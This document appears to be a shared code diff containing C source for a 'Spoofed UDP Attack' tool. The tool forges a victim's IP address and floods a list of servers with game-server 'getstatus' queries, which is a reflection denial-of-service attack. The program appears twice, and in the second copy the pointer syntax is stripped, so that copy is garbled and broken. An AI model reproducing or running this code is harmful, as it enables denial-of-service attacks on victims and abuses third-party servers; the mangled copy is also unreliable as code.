mertcangokgoz · January 28, 2016 12:17
diff --git a/SUDP.c b/SUDP.c
 #include <stdio.h>
 #include <stdlib.h>
 #include <netinet/tcp.h>
 #include <netinet/udp.h>
 #include <netinet/ip.h>
 #include <pthread.h>

 void D(char *message)
 {
 	printf(message);
 	fflush(stdout);
 }

 typedef struct file_list
 {
 	unsigned long ip;
 	int port;
 };

 typedef struct pthread_param
 {
 	unsigned long victim_ip;
 	int victim_port;
 	struct file_list *list;
 	int list_size;
 	char *message;
 };

 typedef struct pseudo_header
 {
    unsigned int source_address;
    unsigned int dest_address;
    unsigned char placeholder;
    unsigned char protocol;
    unsigned short tcp_length;
    struct tcphdr tcp;
 };

 void attack(unsigned long srcip, int srcport, unsigned long destip, int destport, char *message)
 {
    int s = socket (PF_INET, SOCK_RAW, IPPROTO_UDP);
    char packet[4096];
    struct iphdr *iph = (struct iphdr *) packet;
    // struct tcphdr *tcph = (struct tcphdr *) (packet + sizeof (struct ip));
 	struct udphdr *udph = (struct udphdr *) (packet + sizeof(struct ip));
    struct sockaddr_in sin;
    struct pseudo_header psh;
 
    sin.sin_family = AF_INET;
    sin.sin_port = htons(destport);
    sin.sin_addr.s_addr = destip;
 
    memset (packet, 0, 4096);
 
    iph->ihl = 5;
    iph->version = 4;
    iph->tos = 16;
    iph->tot_len = sizeof (struct ip) + sizeof (struct udphdr) + strlen(message);
    iph->id = htonl (54321); 
    iph->frag_off = 0;
    iph->ttl = 255;
    iph->protocol = IPPROTO_UDP;
    iph->check = 0; 
    iph->saddr = srcip; 
    iph->daddr = sin.sin_addr.s_addr;
 
 	udph->source = htons(srcport);
    // Destination port number
    udph->dest = htons(destport);
    udph->len = htons(sizeof(struct udphdr));
 	udph->check = 0; //Kernel fill this in?
 	
 	strncpy((char *)udph + sizeof (struct udphdr),message, 4096 - (sizeof (struct udphdr) + sizeof (struct ip)));
 	
    //IP_HDRINCL needed for own headers
 	int one = 1;
 	const int *val = &one;
 	if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
 	{
 		printf ("[x] Cannot set socket options (are we r00t?)\n");
 		return;
 	}
 
 	if (sendto (s, packet, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof (sin)) < 0)
 		printf ("[x] Error sending packet\n");
 
 	close(s);
    return;
 }

 void *thread_attack(void *thread_params)
 {
 	struct pthread_param *params = thread_params;
 	int i;
 	
 	while (1)
 		for (i = 0; i < params->list_size; i++)
 			attack(params->victim_ip, rand() % 65534 + 1, params->list[i].ip, params->list[i].port, params->message);
 			// Hmm should we use random port or params->victim_port?
 }
 
 char *getLine(FILE *f)
 {
 	char *buffer = malloc(sizeof(char));
 	int pos = 0;
 	char c;

 	do { // read one line
 		c = fgetc(f);
 		if(c != EOF) buffer[pos++] = (char)c;
 		buffer = (char*)realloc(buffer, sizeof(char) * (pos + 2));
 	} while (c != EOF && c != '\n');
 	
 	return buffer;
 } 
 
 int main (int argc, char *argv[])
 {
 	struct file_list *list = NULL;
 	int list_size = 0;
 	
 	struct pthread_param param;
 	pthread_t udp_attack;
 	
 	printf("Spoofed UDP Attack\n");
 	printf("          by eKKiM\n");
 	printf("          for Orgy\n\n");
 	
 	if (argc != 6)
 	{
 		printf("Usage: %s <destip> <destport> <ip_file_list> <time in seconds> <message>\n", argv[0]);
 		return -1;
 	}
 	
 	srand(time(0));
 	
 	FILE *pFile = fopen(argv[3], "r");
 	if (pFile == NULL)
 	{
 		printf("[X] Cannot open file\n");
 		return -1;
 	}
 	
 	while (!feof(pFile))
 	{
 		char *line;
 		line = getLine(pFile);
 		char ip[1024];
 		int port;

 		if (sscanf(line, "%99[^:]:%99d", ip, &port) == 2)
 		{
 			list_size++;
 			list = (struct file_list *) realloc(list, sizeof(struct file_list) * list_size);
 			list[list_size - 1].ip = inet_addr(ip);
 			list[list_size - 1].port = port;
 		}
 		free(line);
 	}
 	
 	fclose(pFile);
 	
 	param.victim_ip = inet_addr(argv[1]);
 	param.victim_port = atoi(argv[2]);
 	
 	param.list = list;
 	param.list_size = list_size;
 	
 	param.message = "\xFF\xFF\xFF\xFF\x67\x65\x74\x73\x74\x61\x74\x75\x73\x10";

 	pthread_create( &udp_attack, NULL, thread_attack, (void*) &param);
 	
 	printf("[*] Attacking..\n");
 	sleep(atoi(argv[4]));
 	printf("[!] Done\n");
 	return 0;
 }
	#include <stdio.h>
	#include <stdlib.h>
	#include <netinet/tcp.h>
	#include <netinet/udp.h>
	#include <netinet/ip.h>
	#include <pthread.h>

	void D(char *message)
	{
	printf(message);
	fflush(stdout);
	}

	typedef struct file_list
	{
	unsigned long ip;
	int port;
	};

	typedef struct pthread_param
	{
	unsigned long victim_ip;
	int victim_port;
	struct file_list *list;
	int list_size;
	char *message;
	};

	typedef struct pseudo_header
	{
	unsigned int source_address;
	unsigned int dest_address;
	unsigned char placeholder;
	unsigned char protocol;
	unsigned short tcp_length;
	struct tcphdr tcp;
	};

	void attack(unsigned long srcip, int srcport, unsigned long destip, int destport, char *message)
	{
	int s = socket (PF_INET, SOCK_RAW, IPPROTO_UDP);
	char packet[4096];
	struct iphdr iph = (struct iphdr ) packet;
	// struct tcphdr tcph = (struct tcphdr ) (packet + sizeof (struct ip));
	struct udphdr udph = (struct udphdr ) (packet + sizeof(struct ip));
	struct sockaddr_in sin;
	struct pseudo_header psh;

	sin.sin_family = AF_INET;
	sin.sin_port = htons(destport);
	sin.sin_addr.s_addr = destip;

	memset (packet, 0, 4096);

	iph->ihl = 5;
	iph->version = 4;
	iph->tos = 16;
	iph->tot_len = sizeof (struct ip) + sizeof (struct udphdr) + strlen(message);
	iph->id = htonl (54321);
	iph->frag_off = 0;
	iph->ttl = 255;
	iph->protocol = IPPROTO_UDP;
	iph->check = 0;
	iph->saddr = srcip;
	iph->daddr = sin.sin_addr.s_addr;

	udph->source = htons(srcport);
	// Destination port number
	udph->dest = htons(destport);
	udph->len = htons(sizeof(struct udphdr));
	udph->check = 0; //Kernel fill this in?

	strncpy((char *)udph + sizeof (struct udphdr),message, 4096 - (sizeof (struct udphdr) + sizeof (struct ip)));

	//IP_HDRINCL needed for own headers
	int one = 1;
	const int *val = &one;
	if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
	{
	printf ("[x] Cannot set socket options (are we r00t?)\n");
	return;
	}

	if (sendto (s, packet, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof (sin)) < 0)
	printf ("[x] Error sending packet\n");

	close(s);
	return;
	}

	void thread_attack(void thread_params)
	{
	struct pthread_param *params = thread_params;
	int i;

	while (1)
	for (i = 0; i < params->list_size; i++)
	attack(params->victim_ip, rand() % 65534 + 1, params->list[i].ip, params->list[i].port, params->message);
	// Hmm should we use random port or params->victim_port?
	}

	char getLine(FILE f)
	{
	char *buffer = malloc(sizeof(char));
	int pos = 0;
	char c;

	do { // read one line
	c = fgetc(f);
	if(c != EOF) buffer[pos++] = (char)c;
	buffer = (char)realloc(buffer, sizeof(char) (pos + 2));
	} while (c != EOF && c != '\n');

	return buffer;
	}

	int main (int argc, char *argv[])
	{
	struct file_list *list = NULL;
	int list_size = 0;

	struct pthread_param param;
	pthread_t udp_attack;

	printf("Spoofed UDP Attack\n");
	printf(" by eKKiM\n");
	printf(" for Orgy\n\n");

	if (argc != 6)
	{
	printf("Usage: %s <destip> <destport> <ip_file_list> <time in seconds> <message>\n", argv[0]);
	return -1;
	}

	srand(time(0));

	FILE *pFile = fopen(argv[3], "r");
	if (pFile == NULL)
	{
	printf("[X] Cannot open file\n");
	return -1;
	}

	while (!feof(pFile))
	{
	char *line;
	line = getLine(pFile);
	char ip[1024];
	int port;

	if (sscanf(line, "%99[^:]:%99d", ip, &port) == 2)
	{
	list_size++;
	list = (struct file_list ) realloc(list, sizeof(struct file_list) list_size);
	list[list_size - 1].ip = inet_addr(ip);
	list[list_size - 1].port = port;
	}
	free(line);
	}

	fclose(pFile);

	param.victim_ip = inet_addr(argv[1]);
	param.victim_port = atoi(argv[2]);

	param.list = list;
	param.list_size = list_size;

	param.message = "\xFF\xFF\xFF\xFF\x67\x65\x74\x73\x74\x61\x74\x75\x73\x10";

	pthread_create( &udp_attack, NULL, thread_attack, (void*) &param);

	printf("[*] Attacking..\n");
	sleep(atoi(argv[4]));
	printf("[!] Done\n");
	return 0;
	}